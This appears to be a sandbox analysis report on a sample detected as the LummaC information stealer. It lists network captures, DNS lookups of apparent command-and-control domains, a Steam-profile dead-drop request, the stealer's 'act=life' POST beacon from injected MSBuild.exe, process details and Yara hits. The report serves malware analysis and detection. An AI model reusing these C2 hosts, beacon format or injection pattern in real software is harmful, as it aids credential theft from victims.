Oct 7, 2024 18:47:55.401772022 CEST	49865	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401777029 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401787996 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401797056 CEST	443	49865	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401854992 CEST	49865	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401896954 CEST	49864	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401907921 CEST	443	49864	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.401958942 CEST	49865	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.401973963 CEST	443	49865	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.409657955 CEST	443	49862	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.413198948 CEST	443	49865	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.413393021 CEST	49866	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.413408041 CEST	443	49866	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.413604021 CEST	49866	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.413625002 CEST	49866	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.413630009 CEST	443	49866	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.428831100 CEST	443	49864	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.428910017 CEST	49864	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.428925037 CEST	49864	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.428931952 CEST	443	49864	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.436431885 CEST	443	49866	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.436503887 CEST	49866	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.436503887 CEST	49866	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.702322006 CEST	49857	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.702380896 CEST	443	49857	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:55.749178886 CEST	49866	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:55.749250889 CEST	443	49866	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.400454044 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.400522947 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.401943922 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.401968956 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.402304888 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.403034925 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.439759970 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.439831018 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.441090107 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.441096067 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.441463947 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.442266941 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.447402954 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.483401060 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.560297966 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.560374975 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.560417891 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.560645103 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.560661077 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.560692072 CEST	49863	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.560698032 CEST	443	49863	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.563637972 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.563678026 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.563713074 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.563720942 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.563731909 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:56.563786983 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.563934088 CEST	49855	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:56.563937902 CEST	443	49855	13.107.253.72	192.168.2.6
Oct 7, 2024 18:48:59.312383890 CEST	49702	80	192.168.2.6	199.232.214.172
Oct 7, 2024 18:48:59.318854094 CEST	80	49702	199.232.214.172	192.168.2.6
Oct 7, 2024 18:48:59.318905115 CEST	49702	80	192.168.2.6	199.232.214.172

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 18:47:22.779941082 CEST	52894	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.790734053 CEST	53	52894	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.801167011 CEST	60570	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.810318947 CEST	53	60570	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.812938929 CEST	49522	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.823749065 CEST	53	49522	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.830380917 CEST	55897	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.841164112 CEST	53	55897	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.866986990 CEST	61829	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.876959085 CEST	53	61829	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.878509998 CEST	63652	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.888202906 CEST	53	63652	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.889648914 CEST	49489	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.898753881 CEST	53	49489	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.899966955 CEST	57019	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.910381079 CEST	53	57019	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:22.911636114 CEST	49775	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:22.919698954 CEST	53	49775	1.1.1.1	192.168.2.6
Oct 7, 2024 18:47:24.323421001 CEST	57481	53	192.168.2.6	1.1.1.1
Oct 7, 2024 18:47:24.335583925 CEST	53	57481	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 18:47:22.779941082 CEST	192.168.2.6	1.1.1.1	0x21cb	Standard query (0)	exemplarou.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.801167011 CEST	192.168.2.6	1.1.1.1	0x13a2	Standard query (0)	frizzettei.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.812938929 CEST	192.168.2.6	1.1.1.1	0x1f8d	Standard query (0)	isoplethui.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.830380917 CEST	192.168.2.6	1.1.1.1	0x3a8d	Standard query (0)	bemuzzeki.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.866986990 CEST	192.168.2.6	1.1.1.1	0x9bb1	Standard query (0)	exilepolsiy.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.878509998 CEST	192.168.2.6	1.1.1.1	0x2d6b	Standard query (0)	laddyirekyi.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.889648914 CEST	192.168.2.6	1.1.1.1	0xf849	Standard query (0)	invinjurhey.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.899966955 CEST	192.168.2.6	1.1.1.1	0x9b43	Standard query (0)	wickedneatr.sbs	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.911636114 CEST	192.168.2.6	1.1.1.1	0x8fe0	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:24.323421001 CEST	192.168.2.6	1.1.1.1	0xc8a8	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 18:47:22.790734053 CEST	1.1.1.1	192.168.2.6	0x21cb	Name error (3)	exemplarou.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.810318947 CEST	1.1.1.1	192.168.2.6	0x13a2	Name error (3)	frizzettei.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.823749065 CEST	1.1.1.1	192.168.2.6	0x1f8d	Name error (3)	isoplethui.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.841164112 CEST	1.1.1.1	192.168.2.6	0x3a8d	Name error (3)	bemuzzeki.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.876959085 CEST	1.1.1.1	192.168.2.6	0x9bb1	Name error (3)	exilepolsiy.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.888202906 CEST	1.1.1.1	192.168.2.6	0x2d6b	Name error (3)	laddyirekyi.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.898753881 CEST	1.1.1.1	192.168.2.6	0xf849	Name error (3)	invinjurhey.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.910381079 CEST	1.1.1.1	192.168.2.6	0x9b43	Name error (3)	wickedneatr.sbs	none	none	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:22.919698954 CEST	1.1.1.1	192.168.2.6	0x8fe0	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:24.335583925 CEST	1.1.1.1	192.168.2.6	0xc8a8	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:24.335583925 CEST	1.1.1.1	192.168.2.6	0xc8a8	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:24.347403049 CEST	1.1.1.1	192.168.2.6	0xbe14	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 18:47:24.347403049 CEST	1.1.1.1	192.168.2.6	0xbe14	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:25.715167999 CEST	1.1.1.1	192.168.2.6	0xa866	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:25.715167999 CEST	1.1.1.1	192.168.2.6	0xa866	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:31.558725119 CEST	1.1.1.1	192.168.2.6	0xb307	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 18:47:31.558725119 CEST	1.1.1.1	192.168.2.6	0xb307	No error (0)	dual.s-part-0044.t-0009.fb-t-msedge.net	s-part-0044.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 18:47:31.558725119 CEST	1.1.1.1	192.168.2.6	0xb307	No error (0)	s-part-0044.t-0009.fb-t-msedge.net		13.107.253.72	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	104.102.49.254	443	2580	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 16:47:23 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-07 16:47:24 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 07 Oct 2024 16:47:23 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=3602ce19802e143f18e3413c; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-07 16:47:24 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-07 16:47:24 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-07 16:47:24 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-07 16:47:24 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49710	104.21.53.8	443	2580	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 16:47:25 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-07 16:47:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-07 16:47:25 UTC	776	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 16:47:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mm066s5r1ktnmajkmlrneuj3k2; expires=Fri, 31 Jan 2025 10:34:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rTa%2BoeGCc1TurpcGTNdcEimF%2FOFi3U7Gqr3Sd0LCF8D2hw9y2P%2BWMnt3AsP%2Fqc5seAnco0cBHy7mpniWUp0iz9mPvxq6YG8EfjpQBT6NNGJAzXOHzZbi7NC8aEk0t81Q4ev4eA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cef5f768dea4303-EWR
2024-10-07 16:47:25 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-07 16:47:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:47:21
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\TuQlz67byH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TuQlz67byH.exe"
Imagebase:	0xec0000
File size:	551'424 bytes
MD5 hash:	8E704ACD1B0C26FDCFD0374D57FCB28E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:47:21
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xa0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:47:21
Start date:	07/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x520000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:47:21
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 288
Imagebase:	0x360000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.1%
Total number of Nodes:	229
Total number of Limit Nodes:	4

Executed Functions

Function 00EC2021 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 631
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00F45AD8,?,00000040,?), ref: 00EC2738

Strings

S, xrefs: 00EC206A
a, xrefs: 00EC2296
', xrefs: 00EC2718
MZx, xrefs: 00EC274B, 00EC2757, 00EC275C

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: '$MZx$S$a
API String ID: 544645111-3057195942
Opcode ID: 7e0a2d3d8a9dd9f067332708a3af79adee0b8c721fff70eed5176aeec14b3281
Instruction ID: 17d12cf27bbfa3b70fc2be193d47e8be0cb1067d50106284a26354e43496e8c2
Opcode Fuzzy Hash: 7e0a2d3d8a9dd9f067332708a3af79adee0b8c721fff70eed5176aeec14b3281
Instruction Fuzzy Hash: 66F1D027934E1B06E70860394E527E5954AD7AA730F91633FBF22BB3F4E36B09439245

Function 00ED8E2E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 00ED8FDD

Part of subcall function 00ED3A83: HeapAlloc.KERNEL32(00000000,00EDA1AA,?,?,00EDA1AA,00000220,?,?,?), ref: 00ED3AB5

__freea.LIBCMT ref: 00ED8FF2
__freea.LIBCMT ref: 00ED9002

Strings

ji!^, xrefs: 00ED8E35

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: __freea$AllocHeap
String ID: ji!^
API String ID: 85559729-848646596
Opcode ID: c6754509f9232021e150629ed8aafd4ff594ad1478cdd526a43aabe8ab5cae3a
Instruction ID: 5f04bf52f453b61b33a271ab43b260c01f4710302eb2ed3a00eb81c618b77146
Opcode Fuzzy Hash: c6754509f9232021e150629ed8aafd4ff594ad1478cdd526a43aabe8ab5cae3a
Instruction Fuzzy Hash: BA51917270021AAFEB219F64CE81EBB77AAEF44754B15112AFD08F6351EB31CC528660

Function 00EDA3A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED9ED6: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00ED9F01

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00EDA1ED,?,00000000,?,?,?), ref: 00EDA407
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00EDA1ED,?,00000000,?,?,?), ref: 00EDA449

Strings

ji!^, xrefs: 00EDA3AE

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: ji!^
API String ID: 546120528-848646596
Opcode ID: b19880557f108318eb77f0793fa82ce30e839fbd17b99dd80ae03137e537259f
Instruction ID: 4e1a6dc6e7b576afdf30c9a75f4619d7f56bb40221552d7140fecd35066ebafd
Opcode Fuzzy Hash: b19880557f108318eb77f0793fa82ce30e839fbd17b99dd80ae03137e537259f
